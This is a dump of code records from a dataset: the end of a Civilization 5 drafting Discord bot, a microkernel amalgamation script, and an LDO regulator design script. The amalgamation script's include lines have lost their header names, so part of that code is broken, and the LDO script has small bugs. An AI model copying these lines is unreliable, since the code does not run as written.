ctx.respond(get_lobby(ctx.guild.id).get_picks())\n#endregion\n\n#region REFERENCE COMMANDS\n####### ####### #######\n# Bot commands for reference material.\n\nreference = bot.create_group(name=\"reference\", description=\"Commands related to Civilization 5 Information.\")\n\n@reference.command(name=\"tiers\", description=\"Print a list civilizations according to tiers.\")\nasync def learn_tiers(ctx: discord.ApplicationContext):\n await ctx.respond(gamedata.info_atc())\n\n@reference.command(name=\"tierfromciv\", description=\"Print the tier of a given civilization.\")\n@option(name=\"civ\", description=\"Which civilization are you looking for?\",\n autocomplete=discord.utils.basic_autocomplete(ac_civ_searcher), required=True)\nasync def tierfromciv(ctx: discord.ApplicationContext, civ: str):\n await ctx.respond(gamedata.info_tfc(civ))\n\n@reference.command(name=\"civsfromtier\", description=\"Print the civilizations in a given tier.\")\n@option(name=\"civ\", description=\"Which tier are you looking for?\",\n autocomplete=discord.utils.basic_autocomplete(ac_tier_searcher))\nasync def civsfromtier(ctx: discord.ApplicationContext, civ: str):\n await ctx.respond(gamedata.info_cft(civ)) \n\n#endregion\n\n#region GENERAL COMMANDS\n####### ####### #######\n# Bot commands for other stuff.\n\ngeneral = bot.create_group(name=\"general\", description=\"Commands related to nothing specific.\")\n\n@general.command(name=\"salute\", description=\"Salutes the author.\")\nasync def salute(ctx):\n await ctx.respond(f\"Hello {ctx.author.mention}!\")\n\n@general.command(name=\"rolldice\", description=\"Simulates roll of dice.\")\n@option(name=\"number_of_dice\", description=\"How many dice?\", min_value=1, max_value=8, default=2, required=True)\n@option(name=\"number_of_sides\", description=\"How many sides?\", min_value=2, max_value=60, default=6, required=True)\nasync def roll(ctx, number_of_dice: int, number_of_sides: int):\n dice = [\n str(random.choice(range(1, number_of_sides + 1)))\n for _ in range(number_of_dice)\n ]\n await ctx.respond(', '.join(dice))\n#endregion\n\n#region RUN THE BOT\n####### ####### #######\n# Run the bot, finally.\n\nbot.run(TOKEN)\n#endregion", "repo_name": "xmyildiz/Civilization_MPDrafter", "sub_path": "scripts/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 10243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 28, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 29, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.Intents.default", "line_number": 33, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 33, "usage_type": "attribute"}, {"api_name": "discord.Bot", "line_number": 38, "usage_type": "call"}, {"api_name": "gamelobby.GameLobby", "line_number": 62, "usage_type": "call"}, {"api_name": "discord.AutocompleteContext", "line_number": 71, "usage_type": "attribute"}, {"api_name": "gamedata.CIVILIZATIONS", "line_number": 73, "usage_type": "attribute"}, {"api_name": "discord.AutocompleteContext", "line_number": 75, "usage_type": "attribute"}, {"api_name": "gamedata.TIERS", "line_number": 77, "usage_type": "attribute"}, {"api_name": "discord.AutocompleteContext", "line_number": 79, "usage_type": "attribute"}, {"api_name": "discord.AutocompleteContext", "line_number": 84, "usage_type": "attribute"}, {"api_name": "gamedata.CIVILIZATIONS", "line_number": 86, "usage_type": "attribute"}, {"api_name": "discord.AutocompleteContext", "line_number": 88, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 104, "usage_type": "attribute"}, {"api_name": "gamelobby.GameLobby", "line_number": 106, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 101, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 102, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 103, "usage_type": "call"}, {"api_name": "discord.ApplicationContext", "line_number": 114, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 120, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 124, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 128, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 135, "usage_type": "attribute"}, {"api_name": "discord.commands.option", "line_number": 133, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 134, "usage_type": "call"}, {"api_name": "discord.ApplicationContext", "line_number": 156, "usage_type": "attribute"}, {"api_name": "discord.commands.option", "line_number": 154, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 155, "usage_type": "call"}, {"api_name": "discord.ApplicationContext", "line_number": 164, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 171, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 176, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 181, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 186, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 197, "usage_type": "attribute"}, {"api_name": "gamedata.info_atc", "line_number": 198, "usage_type": "call"}, {"api_name": "discord.ApplicationContext", "line_number": 203, "usage_type": "attribute"}, {"api_name": "gamedata.info_tfc", "line_number": 204, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 201, "usage_type": "call"}, {"api_name": "discord.utils.basic_autocomplete", "line_number": 202, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 202, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 209, "usage_type": "attribute"}, {"api_name": "gamedata.info_cft", "line_number": 210, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 207, "usage_type": "call"}, {"api_name": "discord.utils.basic_autocomplete", "line_number": 208, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 208, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 229, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 225, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 226, "usage_type": "call"}]}
+{"seq_id": "33398067543", "text": "import argparse\nimport codecs\nimport math\nimport os\nimport re\nimport sys\nimport yaml\n\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nparser = argparse.ArgumentParser(\n description='Amalgamation utility for microkernels')\nparser.add_argument(\"-s\", \"--set\", metavar=\"SET\", required=True,\n help=\"List of microkernel filenames in the BUILD.bazel file\")\nparser.add_argument(\"-i\", \"--include\", metavar=\"INCLUDE\",\n help=\"Header file to include (e.g. immintrin.h, arm_neon.h)\")\nparser.add_argument(\"-o\", \"--output\", metavar=\"FILE\", required=True,\n help='Output (C source) file')\n\n\ndef main(args):\n options = parser.parse_args(args)\n\n build_path = os.path.join(ROOT_DIR, \"..\", \"BUILD.bazel\")\n\n with codecs.open(build_path, \"r\", encoding=\"utf-8\") as build_file:\n build_text = build_file.read()\n\n pattern = r\"\\b\" + options.set + r\"\\b\\s*=\\s*\\[\"\n match = re.search(pattern, build_text)\n if not match:\n raise ValueError(\n \"Failed to find file set %s (regex \\\"%s\\\") inside the BUILD.bazel file\" %\n (options.set, pattern))\n\n start_pos = match.end()\n end_pos = build_text.find(\"]\", start_pos)\n\n fileset = [filename.strip()[1:-1] for filename in\n build_text[start_pos:end_pos].split(\",\")]\n\n amalgam_lines = list()\n amalgam_includes = set()\n for filename in sorted(fileset):\n if not filename:\n continue\n\n filepath = os.path.join(ROOT_DIR, \"..\", filename)\n with codecs.open(filepath, \"r\", encoding=\"utf-8\") as file:\n filelines = file.read().splitlines()\n\n consumed_license = False\n consumed_includes = False\n for line in filelines:\n if line.startswith(\"//\"):\n if not consumed_license:\n # Skip and generate a standard license header for amalgamated file\n continue\n elif line.lstrip().startswith(\"#\"):\n if not consumed_includes:\n amalgam_includes.add(line)\n continue\n consumed_license = True\n elif not line:\n if not consumed_includes:\n # Skip empty lines until end of headers\n continue\n else:\n consumed_license = True\n consumed_includes = True\n\n amalgam_lines.append(line)\n\n amalgam_lines.append(\"\")\n\n # Multi-line sequence for XOP intrinsics, which don't have a standardized header\n amalgam_includes.discard(\"#ifdef _MSC_VER\")\n amalgam_includes.discard(\" #include \")\n amalgam_includes.discard(\"#else\")\n amalgam_includes.discard(\" #include \")\n amalgam_includes.discard(\"#endif\")\n\n # Single-line sequences for intrinsics with a standardized header\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n\n amalgam_text = \"\"\"\\\n// Copyright 2021 Google LLC\n//\n// This source code is licensed under the BSD-style license found in the\n// LICENSE file in the root directory of this source tree.\n\n\"\"\"\n\n amalgam_text += \"\\n\".join(sorted(inc for inc in amalgam_includes if\n not inc.startswith(\"#include \\n\"\n amalgam_text += \"#else\\n\"\n amalgam_text += \" #include \\n\"\n amalgam_text += \"#endif\\n\\n\"\n else:\n amalgam_text += \"\\n\\n#include <%s>\\n\\n\" % options.include\n else:\n amalgam_text += \"\\n\\n\"\n amalgam_text += \"\\n\".join(sorted(inc for inc in amalgam_includes if\n inc.startswith(\"#include Mapping[str,str]:\n # type: () -> Dict[str, str]\n \"\"\"Returns a dictionary from parameter names to descriptions.\n\n Returns\n -------\n param_info : Optional[Dict[str, str]]\n dictionary from parameter names to descriptions.\n \"\"\"\n ans = super().get_params_info()\n # TODO: add resistors to specfile_dict and th_dict \n ans.update(dict(\n specfile_dict = 'Transistor database spec file names for each device',\n series_type = 'n or p for type of series device',\n th_dict = 'Transistor flavor dictionary.',\n l_dict = 'Transistor channel length dictionary',\n sim_env = 'Simulation environment',\n vdd = 'Supply voltage in volts.',\n vout = 'Reference voltage to regulate the output to',\n loadreg = 'Maximum absolute change in output voltage given change in output current',\n ibias = 'Maximum bias current of amp and biasing, in amperes.',\n rload = 'Load resistance from the output of the LDO to ground',\n cload = 'Load capacitance from the output of the LDO to ground',\n psrr = 'Minimum power supply rejection ratio (dB, 20*log10(dVdd/dVout))',\n psrr_fbw = 'Minimum bandwidth for power supply rejection roll-off',\n pm = 'Minimum phase margin for the large feedback loop',\n amp_dsn_params = \"Amplifier design parameters that aren't either calculated or handled above\",\n bias_dsn_params = \"Design parameters for the biasing that aren't calculated or handled above.\",\n tb_stb_params = '',\n tb_loadreg_params = '',\n run_sim = 'True to check figures of merit against simulation rather than just LTI',\n ))\n return ans\n\n def dsn_fet(self, **params):\n specfile_dict = params['specfile_dict']\n series_type = params['series_type']\n th_dict = params['th_dict']\n sim_env = params['sim_env']\n\n db_dict = {k:get_mos_db(spec_file=specfile_dict[k],\n intent=th_dict[k],\n sim_env=sim_env) for k in specfile_dict.keys()}\n\n vdd = params['vdd']\n vout = params['vout']\n vg = params['vg']\n rload = params['rload']\n\n vs = vout if series_type == 'n' else vdd\n vd = vdd if series_type == 'n' else vout\n vb = 0 if series_type == 'n' else vdd\n\n ser_op = db_dict['ser'].query(vgs=vg-vs, vds=vd-vs, vbs=vb-vs)\n idc = vout/rload\n nf = int(round(idc/ser_op['ibias']))\n return nf > 1, dict(nf=nf, op=ser_op)\n\n\n def meet_spec(self, **params) -> List[Mapping[str,Any]]:\n specfile_dict = params['specfile_dict']\n th_dict = params['th_dict']\n l_dict = params['l_dict']\n sim_env = params['sim_env']\n run_sim = params['run_sim']\n\n # TODO simulating\n tb_stb_params = params['tb_stb_params']\n tb_loadreg_params = params['tb_loadreg_params']\n tb_num = 0\n\n db_dict = {k:get_mos_db(spec_file=specfile_dict[k],\n intent=th_dict[k],\n sim_env=sim_env) for k in specfile_dict.keys()}\n\n ser_type = params['series_type']\n vdd = params['vdd']\n vout = params['vout']\n loadreg = params['loadreg'] # TODO load regulation\n ibias_max = params['ibias']\n rload = params['rload']\n cload = params['cload']\n psrr_min = params['psrr']\n psrr_fbw_min = params['psrr_fbw']\n pm_min = params['pm']\n loadreg_max = params['loadreg']\n\n vth_ser = estimate_vth(db=db_dict['ser'],\n is_nch=ser_type=='n',\n lch=l_dict['ser'],\n vgs=vdd-vout if ser_type=='n' else vout-vdd,\n vbs=0-vout if ser_type=='n' else vdd-vdd)\n \n # Spec out amplifier\n amp_specfile_dict = dict()\n amp_th_dict = dict()\n amp_l_dict = dict()\n\n for k in ('in', 'tail', 'load'):\n amp_specfile_dict[k] = specfile_dict[f'amp_{k}']\n amp_th_dict[k] = th_dict[f'amp_{k}']\n amp_l_dict[k] = l_dict[f'amp_{k}']\n amp_dsn_params = dict(params['amp_dsn_params'])\n amp_dsn_params.update(dict(vincm=vout,\n specfile_dict=amp_specfile_dict,\n th_dict=amp_th_dict,\n l_dict=amp_l_dict,\n sim_env=sim_env,\n vdd=vdd))\n\n # Spec out biasing\n bias_specfile_dict = dict()\n bias_th_dict = dict()\n bias_l_dict = dict()\n for k in ('n', 'p'):\n bias_specfile_dict[k] = specfile_dict[f'bias_{k}']\n bias_th_dict[k] = th_dict[f'bias_{k}']\n bias_l_dict[k] = l_dict[f'bias_{k}']\n bias_dsn_params = dict(params['bias_dsn_params'])\n bias_dsn_params.update(dict(specfile_dict=bias_specfile_dict,\n th_dict=bias_th_dict,\n l_dict=bias_l_dict,\n sim_env=sim_env,\n vdd=vdd))\n\n # Keep track of viable ops\n viable_op_list = []\n\n self.other_params = dict(l_dict=l_dict,\n w_dict={k:db.width_list[0] for k,db in db_dict.items()},\n th_dict=th_dict,\n rload=rload,\n cload=cload,\n series_type=ser_type)\n\n amp_dsn_mod = bag2_analog__amp_diff_mirr_dsn()\n bias_dsn_mod = bag2_analog__constant_gm_dsn()\n\n # Sweep gate bias voltage of the series device\n vg_min = vout+vth_ser\n vg_max = min(vdd+vth_ser, vdd)\n vg_vec = np.arange(vg_min, vg_max, 10e-3)\n\n for vg in vg_vec:\n print('Designing the series device...')\n # Size the series device\n match_ser, ser_info = self.dsn_fet(vg=vg, **params)\n if not match_ser:\n continue\n print('Done')\n\n # Design amplifier s.t. output bias = gate voltage\n # This is to maintain accuracy in the computational design proces\n print('Designing the amplifier...')\n ser_op = ser_info['op']\n amp_cload = ser_op['cgg']\n amp_dsn_params.update(dict(cload=amp_cload,\n optional_params=dict(voutcm=vg),\n ibias=ibias_max))\n try:\n disable_print()\n amp_dsn_lst = amp_dsn_mod.meet_spec(**amp_dsn_params)\n except ValueError:\n continue\n finally:\n enable_print()\n print(f'{len(amp_dsn_lst)} viable amps')\n\n # For each possibility, design the biasing\n for amp_dsn_info in amp_dsn_lst:\n if amp_dsn_params['in_type'] == 'n':\n bias_dsn_params.update(dict(vref=dict(n=amp_dsn_info['vgtail']),\n res_side='n'),\n ibias=ibias_max-amp_dsn_info['ibias'])\n else:\n bias_dsn_params.update(dict(vref=dict(p=amp_dsn_info['vgtail']),\n res_side='p'),\n ibias=ibias_max-amp-dsn_info['ibias'])\n\n print(f'Attempting to design biasing...')\n try:\n disable_print()\n _, bias_dsn_info = bias_dsn_mod.design(**bias_dsn_params)\n except ValueError:\n continue\n finally:\n enable_print()\n print('Done')\n\n op_dict = {'in' : amp_dsn_info['op_in'],\n 'tail' : amp_dsn_info['op_tail'] ,\n 'load' : amp_dsn_info['op_load'],\n 'ser' : ser_info['op']}\n\n nf_dict = {'in' : amp_dsn_info['nf_in'],\n 'tail' : amp_dsn_info['nf_tail'],\n 'load' : amp_dsn_info['nf_load'],\n 'ser' : ser_info['nf']}\n\n ## Check PSRR\n psrr_lti, psrr_fbw_lti, = self._get_psrr_lti(op_dict=op_dict,\n nf_dict=nf_dict,\n series_type=ser_type,\n amp_in=amp_dsn_params['in_type'],\n rload=rload,\n cload=cload)\n\n if psrr_lti < psrr_min:\n print(f'psrr {psrr_lti}')\n continue\n\n if psrr_fbw_lti < psrr_fbw_min:\n print(f'psrr fbw {psrr_fbw_lti}')\n continue\n\n ## Check phase margin\n pm_lti = self._get_stb_lti(op_dict=op_dict, \n nf_dict=nf_dict, \n series_type=ser_type,\n rload=rload,\n cload=cload)\n\n if np.isnan(pm_lti):\n pm_lti = -1\n\n if pm_lti < pm_min:\n print(f'pm {pm_lti}')\n continue\n\n ## Check load regulation\n loadreg_eqn = self._get_loadreg_eqn()\n if loadreg_eqn > loadreg_max:\n print(f'loadreg {loadreg_eqn}')\n continue\n\n op = dict(amp_params=amp_dsn_info,\n bias_params=bias_dsn_info,\n ser_params=ser_info, \n pm=pm_lti,\n psrr=psrr_lti,\n psrr_fbw=psrr_fbw_lti,\n loadreg=loadreg_eqn,\n vg=vg,\n amp_dsn=amp_dsn_params,\n bias_dsn=bias_dsn_params,\n amp_mod=amp_dsn_mod,\n bias_mod=bias_dsn_mod,)\n\n ### Run simulations if desired\n if run_sim:\n prj = BagProject()\n tb_sch_params = self.get_sch_params(op)\n ## Check PSRR\n psrr_sim, psrr_fbw_sim = self._get_psrr_sim()\n if psrr_sim < psrr_min:\n print(f'psrr {psrr_sim}')\n continue\n \n if psrr_fbw_sim < psrr_fbw_min:\n print(f'psrr fbw {psrr_fbw_sim}')\n continue\n\n ## Check phase margin\n tb_stb_vars = dict(CLOAD=cload,\n RLOAD=rload,\n VDD=vdd,\n VGTAIL=amp_dsn_info['vgtail'],\n VREF=vout)\n tb_stb_params = dict(tb_stb_params)\n tb_stb_params.update(dict(prj=prj,\n params=tb_sch_params,\n tb_vars=tb_stb_vars,\n num=tb_num))\n\n print('Simulating stability...')\n pm_sim = self._get_stb_sim(**tb_stb_params)\n print('...done')\n\n if pm_sim < pm_min:\n print(f'pm {pm_sim}')\n tb_num = tb_num + 1\n continue\n\n ## Check load regulation\n tb_loadreg_params = dict(tb_loadreg_params)\n # Default values\n tb_loadreg_vars_init = tb_loadreg_params['tb_vars']\n tb_loadreg_vars = dict(DUTYCYCLE=0.5,\n IHIGH=vout/rload*1.1,\n ILOW=vout/rload*0.9,\n TSTART=0,\n TSTOP=tb_loadreg_vars_init['TPER']*10,\n VDD=vdd,\n vref=vout)\n tb_loadreg_vars.update(tb_loadreg_params['tb_vars'])\n tb_loadreg_params.update(dict(prj=prj,\n params=tb_sch_params,\n tb_vars=tb_loadreg_vars,\n num=tb_num))\n\n print('Simulating load regulation...')\n loadreg_sim = self._get_loadreg_sim(**tb_loadreg_params)\n print('...done')\n\n if loadreg_sim > loadreg_max:\n print(f'load reg {loadreg_sim}')\n tb_num = tb_num + 1\n continue\n \n tb_num = tb_num + 1\n\n op.update(pm=pm_sim,\n psrr=psrr_sim,\n psrr_fbw=psrr_fbw_sim,\n loadreg=loadreg_sim)\n\n\n pprint(op)\n viable_op_list.append(op)\n\n return viable_op_list\n\n def _get_psrr_lti(self, op_dict, nf_dict, series_type, amp_in, rload, cload) -> float:\n '''\n Outputs:\n psrr: PSRR (dB)\n fbw: Power supply -> output 3dB bandwidth (Hz)\n '''\n n_ser = series_type == 'n'\n n_amp = amp_in == 'n'\n\n # Supply -> output gain\n ckt_sup = LTICircuit()\n ser_d = 'vdd' if n_ser else 'reg'\n ser_s = 'reg' if n_ser else 'vdd'\n inp_conn = 'gnd' if n_ser else 'reg'\n inn_conn = 'reg' if n_ser else 'gnd'\n tail_rail = 'gnd' if n_amp else 'vdd'\n load_rail = 'vdd' if n_amp else 'gnd'\n ckt_sup.add_transistor(op_dict['ser'], ser_d, 'out', ser_s, fg=nf_dict['ser'], neg_cap=False)\n ckt_sup.add_res(rload, 'reg', 'gnd')\n ckt_sup.add_cap(rload, 'reg', 'gnd')\n ckt_sup.add_transistor(op_dict['in'], 'outx', inp_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n ckt_sup.add_transistor(op_dict['in'], 'out', inn_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n ckt_sup.add_transistor(op_dict['tail'], 'tail', 'gnd', tail_rail, fg=nf_dict['tail'], neg_cap=False)\n ckt_sup.add_transistor(op_dict['load'], 'outx', 'outx', load_rail, fg=nf_dict['load'], neg_cap=False)\n ckt_sup.add_transistor(op_dict['load'], 'out', 'outx', load_rail, fg=nf_dict['load'], neg_cap=False)\n\n num_sup, den_sup = ckt_sup.get_num_den(in_name='vdd', out_name='reg', in_type='v')\n gain_sup = num_sup[-1]/den_sup[-1]\n wbw_sup = get_w_3db(num_sup, den_sup)\n\n # Reference -> output gain\n # ckt_norm = LTICircuit()\n # ser_d = 'gnd' if n_ser else 'reg'\n # ser_s = 'reg' if n_ser else 'gnd'\n # inp_conn = 'in' if n_ser else 'reg'\n # inn_conn = 'reg' if n_ser else 'in'\n # ckt_norm.add_transistor(op_dict['ser'], ser_d, 'out', ser_s, fg=nf_dict['ser'], neg_cap=False)\n # ckt_norm.add_res(rload, 'reg', 'gnd')\n # ckt_norm.add_cap(rload, 'reg', 'gnd')\n # ckt_norm.add_transistor(op_dict['in'], 'outx', inp_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n # ckt_norm.add_transistor(op_dict['in'], 'out', inn_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n # ckt_norm.add_transistor(op_dict['tail'], 'tail', 'gnd', 'gnd', fg=nf_dict['tail'], neg_cap=False)\n # ckt_norm.add_transistor(op_dict['load'], 'outx', 'outx', 'gnd', fg=nf_dict['load'], neg_cap=False)\n # ckt_norm.add_transistor(op_dict['load'], 'out', 'outx', 'gnd', fg=nf_dict['load'], neg_cap=False)\n\n # num_norm, den_norm = ckt_norm.get_num_den(in_name='in', out_name='reg', in_type='v')\n # gain_norm = num_norm[-1]/den_norm[-1]\n\n if gain_sup == 0:\n return float('inf')\n if wbw_sup == None:\n wbw_sup = 0\n fbw_sup = wbw_sup / (2*np.pi)\n\n psrr = 10*np.log10((1/gain_sup)**2)\n\n return psrr, fbw_sup\n\n def _get_stb_lti(self, op_dict, nf_dict, series_type, rload, cload) -> float:\n '''\n Returns:\n pm: Phase margins (in degrees)\n '''\n ckt = LTICircuit()\n\n n_ser = series_type == 'n'\n \n # Series device\n ser_d = 'gnd' if n_ser else 'reg'\n ser_s = 'reg' if n_ser else 'gnd'\n ckt.add_transistor(op_dict['ser'], ser_d, 'out', ser_s, fg=nf_dict['ser'], neg_cap=False)\n\n # Load passives\n ckt.add_res(rload, 'reg', 'gnd')\n ckt.add_cap(rload, 'reg', 'gnd')\n # TODO include any compensation passives\n\n # Amplifier\n inp_conn = 'gnd' if n_ser else 'in'\n inn_conn = 'gnd' if not n_ser else 'in' \n ckt.add_transistor(op_dict['in'], 'outx', inp_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n ckt.add_transistor(op_dict['in'], 'out', inn_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n ckt.add_transistor(op_dict['tail'], 'tail', 'gnd', 'gnd', fg=nf_dict['tail'], neg_cap=False)\n ckt.add_transistor(op_dict['load'], 'outx', 'outx', 'gnd', fg=nf_dict['load'], neg_cap=False)\n ckt.add_transistor(op_dict['load'], 'out', 'outx', 'gnd', fg=nf_dict['load'], neg_cap=False)\n\n # Calculating stability margins\n num, den = ckt.get_num_den(in_name='in', out_name='reg', in_type='v')\n pm, _ = get_stability_margins(np.convolve(num, [-1]), den)\n\n return pm\n\n def _get_loadreg_eqn(self) -> float:\n # TODO\n return 0.0\n\n def _get_psrr_sim(self, **spec):\n # TODO\n return np.inf, np.inf\n\n def _get_stb_sim(self, **spec):\n '''\n Inputs:\n prj: BagProject\n tb_vars: Testbench variables to set in ADE testbench\n tb_lib: The template testbench library.\n tb_cell: The template testbench cell.\n impl_lib: The implemented testbench library.\n tb_gen_name: The generated testbench base name.\n num: The generated testbench number.\n Outputs:\n pm: Simultaed phase margin in degrees\n '''\n prj = spec['prj']\n tb_vars = spec['tb_vars']\n tb_lib = spec['tb_lib']\n tb_cell = spec['tb_cell']\n impl_lib = spec['impl_lib']\n # impl_cell = spec['impl_cell']\n tb_gen_name = self._get_tb_gen_name(spec['tb_gen_name'], spec['num'])\n\n # generate testbench schematic\n tb_dsn = prj.create_design_module(tb_lib, tb_cell)\n tb_dsn.design(**spec['params'])\n tb_dsn.implement_design(impl_lib, top_cell_name=tb_gen_name)\n\n # copy and load ADEXL state of generated testbench\n tb_obj = prj.configure_testbench(impl_lib, tb_gen_name)\n\n # Assign testbench design variables (the ones that show in ADE)\n for param_name, param_val in tb_vars.items():\n tb_obj.set_parameter(param_name, param_val)\n\n # Update testbench changes and run simulation\n tb_obj.update_testbench()\n print(f'Simulating testbench {tb_gen_name}')\n save_dir = tb_obj.run_simulation()\n\n # Load simulation results into Python\n print('Simulation done, loading results')\n results = load_sim_results(save_dir)\n\n pm = results.get('stb_pm', np.inf)\n\n return pm\n\n def _get_loadreg_sim(self, **spec):\n prj = spec['prj']\n tb_vars = spec['tb_vars']\n tb_lib = spec['tb_lib']\n tb_cell = spec['tb_cell']\n impl_lib = spec['impl_lib']\n # impl_cell = spec['impl_cell']\n tb_gen_name = self._get_tb_gen_name(spec['tb_gen_name'], spec['num'])\n\n # Generate testbench schematic\n tb_dsn = prj.create_design_module(tb_lib, tb_cell)\n tb_dsn.design(**(spec['params']))\n tb_dsn.implement_design(impl_lib, top_cell_name=tb_gen_name)\n\n # Copy and load ADEXL state of generated testbench\n tb_obj = prj.configure_testbench(impl_lib, tb_gen_name)\n\n # Assign testbench design variables (the ones that show in ADE)\n for param_name, param_val in tb_vars.items():\n tb_obj.set_parameter(param_name, param_val)\n\n # Update testbench changes and run simulation\n tb_obj.update_testbench()\n print(f'Simulating testbench {tb_gen_name}')\n save_dir = tb_obj.run_simulation()\n\n # Load simulation results into Python\n print(\"Simulation done, loading results\")\n results = load_sim_results(save_dir)\n\n vreg = results['tran_vreg']\n return abs(min(vreg)-max(vreg))\n # return min(vreg), max(vreg)\n\n def _get_tb_gen_name(self, base, num):\n return f'{base}_{num}'\n\n\n def op_compare(self, op1:Mapping[str,Any], op2:Mapping[str,Any]):\n return op1 if op1['ibias'] < op2['ibias'] else op2\n\n def get_sch_params(self, op):\n amp_dsn_info = op['amp_params']\n bias_dsn_info = op['bias_params']\n ser_dsn_info = op['ser_params']\n series_params = {'type' : self.other_params['series_type'],\n 'l' : self.other_params['l_dict']['ser'],\n 'w' : self.other_params['w_dict']['ser'],\n 'intent' : self.other_params['th_dict']['ser'],\n 'nf' : ser_dsn_info['nf']}\n\n amp_params = op['amp_mod'].get_sch_params(amp_dsn_info)\n biasing_params = op['bias_mod'].get_sch_params(bias_dsn_info)\n\n biasing_params.pop('res_side', None)\n\n # TODO real resistor\n biasing_params['th_dict'].update(dict(res='ideal'))\n\n # amp_params = dict(in_type=amp_dsn_info['in_type'],\n # l_dict=op['amp_dsn']['l_dict'],\n # w_dict=op['amp_dsn']['w_dict'],\n # th_dict=op['amp_dsn']['th_dict'],\n # seg_dict={'in' : amp_dsn_info['nf_in'],\n # 'tail' : amp_dsn_info['nf_tail'],\n # 'load' : amp_dsn_info['nf_load']})\n\n # biasing_params = dict(bulk_conn='VDD',\n # l_dict=op['bias_dsn']['l_dict'],\n # w_dict=op['bias_dsn']['w_dict'],\n # th_dict=op['bias_dsn']['th_dict'],\n # device_mult=)\n cap_conn_list = []\n cap_param_list = []\n res_conn_list = []\n res_param_list = []\n\n return dict(series_params=series_params,\n amp_params=amp_params,\n biasing_params=biasing_params,\n cap_conn_list=cap_conn_list,\n cap_param_list=cap_param_list,\n res_conn_list=res_conn_list,\n res_param_list=res_param_list)", "repo_name": "PisterLab/span_ion", "sub_path": "scripts_dsn/regulator_ldo_series.py", "file_name": "regulator_ldo_series.py", "file_ext": "py", "file_size_in_byte": 24067, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Mapping", "line_number": 28, "usage_type": "name"}, {"api_name": "amp_diff_mirr.bag2_analog__amp_diff_mirr_dsn", "line_number": 163, "usage_type": "call"}, {"api_name": "constant_gm.bag2_analog__constant_gm_dsn", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 250, "usage_type": "call"}, {"api_name": "bag.core.BagProject", "line_number": 278, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 345, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 87, "usage_type": "name"}, {"api_name": "bag.data.lti.LTICircuit", "line_number": 360, "usage_type": "call"}, {"api_name": "bag.data.lti.get_w_3db", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 402, "usage_type": "attribute"}, {"api_name": "numpy.log10", "line_number": 404, "usage_type": "call"}, {"api_name": "bag.data.lti.LTICircuit", "line_number": 413, "usage_type": "call"}, {"api_name": "bag.data.lti.get_stability_margins", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 448, "usage_type": "attribute"}, {"api_name": "bag.io.load_sim_results", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 492, "usage_type": "attribute"}, {"api_name": "bag.io.load_sim_results", "line_number": 524, "usage_type": "call"}, {"api_name": "typing.Mapping", "line_number": 534, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 534, "usage_type": "name"}]}
